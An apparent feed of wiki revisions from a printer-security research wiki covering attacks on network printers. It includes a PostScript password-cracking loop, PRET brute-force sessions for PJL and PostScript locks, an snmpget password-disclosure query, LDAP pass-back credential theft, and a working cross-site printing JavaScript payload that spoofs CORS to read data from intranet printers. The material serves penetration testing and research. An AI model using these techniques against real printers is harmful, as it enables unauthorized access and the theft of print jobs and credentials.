&lt;div&gt;Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure.&lt;br /&gt;
&lt;br /&gt;
== Brute-Force Attacks ==&lt;br /&gt;
&lt;br /&gt;
Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.&lt;br /&gt;
&lt;br /&gt;
=== PJL ===&lt;br /&gt;
&lt;br /&gt;
PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities &amp;lt;ref&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
 @PJL JOB PASSWORD=0&lt;br /&gt;
 @PJL DEFAULT PASSWORD=12345&lt;br /&gt;
 @PJL DEFAULT DISKLOCK=ON&lt;br /&gt;
 @PJL DEFAULT CPLOCK=ON&lt;br /&gt;
&lt;br /&gt;
PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by &amp;lt;ref&amp;gt;''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002&amp;lt;/ref&amp;gt; who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 &amp;lt;ref&amp;gt;''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21&amp;lt;/ref&amp;gt;, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes.&lt;br /&gt;
&lt;br /&gt;
While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 PIN protection:  ENABLED&lt;br /&gt;
 Panel lock:      ON&lt;br /&gt;
 Disk lock:       ON&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No PIN given, cracking.&lt;br /&gt;
 PIN protection:  DISABLED&lt;br /&gt;
 Panel lock:      OFF&lt;br /&gt;
 Disk lock:       OFF&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.&lt;br /&gt;
&lt;br /&gt;
=== PostScript ===&lt;br /&gt;
&lt;br /&gt;
PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once &amp;lt;ref&amp;gt;''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194&amp;lt;/ref&amp;gt;. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,535 &amp;lt;ref&amp;gt;''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739&amp;lt;/ref&amp;gt; which theoretically allows 524,280 bit passwords. On the positive side (from an attacker's point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
/min 0 def /max 1000000 def&lt;br /&gt;
statusdict begin {&lt;br /&gt;
  min 1 max&lt;br /&gt;
  {dup checkpassword {== flush stop} {pop} ifelse} for&lt;br /&gt;
} stopped pop&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No password given, cracking.&lt;br /&gt;
 Found password: 999&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.&lt;br /&gt;
&lt;br /&gt;
== Password Disclosure ==&lt;br /&gt;
&lt;br /&gt;
=== SNMP ===&lt;br /&gt;
&lt;br /&gt;
Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
To test this attack against ancient HP printers, the ''snmpget'' tool can be used as shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0&lt;br /&gt;
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices respond only with zero bytes.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can send network packets to port 161/udp of the printer device. &lt;br /&gt;
&lt;br /&gt;
=== Pass-Back ===&lt;br /&gt;
&lt;br /&gt;
Another interesting class of attacks is pass-back attacks, where ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ &amp;lt;ref&amp;gt;''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011&amp;lt;/ref&amp;gt;. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, then whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] attackers if the web application running on the printer has no CSRF protection.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=USB_drive_or_cable&amp;diff=316</id>
		<title>USB drive or cable</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=USB_drive_or_cable&amp;diff=316"/>
				<updated>2017-01-31T08:35:52Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:USB-deployment-channel.png|thumb|160px|Printing over USB]]&lt;br /&gt;
&lt;br /&gt;
Data can be sent to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allow users to print directly from a USB device. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to a printer can generally be considered less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from a USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. &amp;lt;!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --&amp;gt; &amp;lt;!-- smart card based access control --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'' '''Is your copy room always locked?''' ''&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Cross-site_printing&amp;diff=315</id>
		<title>Cross-site printing</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Cross-site_printing&amp;diff=315"/>
				<updated>2017-01-31T08:33:14Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Proof-of-concept */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by &amp;lt;ref&amp;gt;''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007&amp;lt;/ref&amp;gt; who uses a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved, which enables a web attacker to perform most attacks described in this wiki, including obtaining captured print jobs, with the victim's web browser acting as a carrier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]]&lt;br /&gt;
&lt;br /&gt;
== Enhanced cross-site printing ==&lt;br /&gt;
&lt;br /&gt;
Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in &amp;lt;ref&amp;gt;''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007&amp;lt;/ref&amp;gt; to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be sent to the device, not received, because of the same-origin policy &amp;lt;ref&amp;gt;''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001&amp;lt;/ref&amp;gt;. This rules out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) &amp;lt;ref&amp;gt;''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010&amp;lt;/ref&amp;gt; can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be sent in the response – including arbitrary CORS &amp;lt;code&amp;gt;Access-Control-Allow-Origin&amp;lt;/code&amp;gt; fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]]&lt;br /&gt;
&lt;br /&gt;
In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snippet is shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=javascript&amp;gt;&lt;br /&gt;
job = &amp;quot;\x1B%-12345X\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;%!\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(HTTP/1.0 200 OK\\n) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(Server: PostScript HTTPD\\n) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(Access-Control-Allow-Origin: *\\n) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(Connection: close\\n) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(Content-Length: ) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;product dup length dup string cvs print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(\\n\\n) print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;print\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;(\\n) print flush\r\n&amp;quot;&lt;br /&gt;
    + &amp;quot;\x1B%-12345X\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
var x = new XMLHttpRequest();&lt;br /&gt;
x.open(&amp;quot;POST&amp;quot;, &amp;quot;http://printer:9100&amp;quot;);&lt;br /&gt;
x.send(job);&lt;br /&gt;
x.onreadystatechange = function() {&lt;br /&gt;
  if (x.readyState == 4)&lt;br /&gt;
    alert(x.responseText);&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Limitations of cross-site printing ==&lt;br /&gt;
&lt;br /&gt;
Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends &amp;lt;code&amp;gt;@PJL ECHO&amp;lt;/code&amp;gt; to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct &amp;lt;code&amp;gt;Content-Length&amp;lt;/code&amp;gt; for the data to be sent in the response needs to be determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding is not an option either, she needs to set a very high value and use padding. Second, adding the &amp;lt;code&amp;gt;Connection: close&amp;lt;/code&amp;gt; header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.&lt;br /&gt;
&lt;br /&gt;
If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the &amp;lt;code&amp;gt;Origin&amp;lt;/code&amp;gt; header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by &amp;lt;ref&amp;gt;''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001&amp;lt;/ref&amp;gt; and &amp;lt;ref&amp;gt;''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007&amp;lt;/ref&amp;gt; they have some drawbacks beyond not providing feedback using spoofed CORS headers:&lt;br /&gt;
&lt;br /&gt;
* Cross-protocol access to LPD and FTP ports is blocked by various web browsers&lt;br /&gt;
* Parameters for direct printing over the embedded web server are model-specific&lt;br /&gt;
* The IPP standard requires the &amp;lt;code&amp;gt;Content-type&amp;lt;/code&amp;gt; for HTTP POST requests being set to &amp;lt;code&amp;gt;application/ipp&amp;lt;/code&amp;gt; &amp;lt;ref&amp;gt;''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000&amp;lt;/ref&amp;gt; which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types&lt;br /&gt;
&lt;br /&gt;
A comparison of cross-site printing channels is given below:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by&lt;br /&gt;
|-&lt;br /&gt;
| Raw    || -           || ✔                     || ✔            || -&lt;br /&gt;
|-&lt;br /&gt;
| Web    || ✔           || -                     || -            || -&lt;br /&gt;
|-&lt;br /&gt;
| IPP    || ✔           || -                     || ✔            || -&lt;br /&gt;
|-&lt;br /&gt;
| LPD    || ✔           || -                     || ✔&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | FF, Ch, Op&lt;br /&gt;
|-&lt;br /&gt;
| FTP    || ✔           || -                     || ✔&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | FF, Ch, Op, IE&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC &amp;lt;ref&amp;gt;''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014&amp;lt;/ref&amp;gt; which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.&lt;br /&gt;
&lt;br /&gt;
== Proof-of-concept ==&lt;br /&gt;
&lt;br /&gt;
A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=LPD&amp;diff=314</id>
		<title>LPD</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=LPD&amp;diff=314"/>
				<updated>2017-01-31T08:32:36Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]]&lt;br /&gt;
&lt;br /&gt;
The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s. The existing implementation was later specified by RFC1179 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990&amp;lt;/ref&amp;gt;. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However, it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating systems is ''LPRng'' &amp;lt;ref&amp;gt;''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell&amp;lt;/ref&amp;gt;. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below:&lt;br /&gt;
&lt;br /&gt;
 lpdprint.py hostname filename&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=LPD&amp;diff=313</id>
		<title>LPD</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=LPD&amp;diff=313"/>
				<updated>2017-01-31T08:30:59Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]]&lt;br /&gt;
&lt;br /&gt;
The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990&amp;lt;/ref&amp;gt;. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However, it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating systems is ''LPRng'' &amp;lt;ref&amp;gt;''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell&amp;lt;/ref&amp;gt;. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below:&lt;br /&gt;
&lt;br /&gt;
 lpdprint.py hostname filename&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=SMB&amp;diff=312</id>
		<title>SMB</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=SMB&amp;diff=312"/>
				<updated>2017-01-31T08:29:45Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:SMB-deployment-channel.png|thumb|180px|Printing over SMB]]&lt;br /&gt;
&lt;br /&gt;
Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers &amp;lt;ref&amp;gt;''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library&amp;lt;/ref&amp;gt;. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows:&lt;br /&gt;
&lt;br /&gt;
 C:\&amp;gt; copy /b file \\server\share&lt;br /&gt;
&lt;br /&gt;
...where &amp;lt;code&amp;gt;server&amp;lt;/code&amp;gt; is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and &amp;lt;code&amp;gt;share&amp;lt;/code&amp;gt; is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achieved with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite:&lt;br /&gt;
&lt;br /&gt;
 smbclient [-N|-U user] //server/share -c &amp;quot;print file&amp;quot;&lt;br /&gt;
 smbspool smb://[user:pass]@server/share 0 user title 1 &amp;quot;&amp;quot; file&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=IPP&amp;diff=311</id>
		<title>IPP</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=IPP&amp;diff=311"/>
				<updated>2017-01-31T08:27:31Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:IPP-deployment-channel.png|thumb|180px|Printing over IPP]]&lt;br /&gt;
&lt;br /&gt;
Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000&amp;lt;/ref&amp;gt; and RFC2911 &amp;lt;ref&amp;gt;''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000&amp;lt;/ref&amp;gt;. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in &amp;lt;ref&amp;gt;''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013&amp;lt;/ref&amp;gt; is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing &amp;lt;ref&amp;gt;''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016&amp;lt;/ref&amp;gt; have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' &amp;lt;ref&amp;gt;''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet&amp;lt;/ref&amp;gt;, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. 
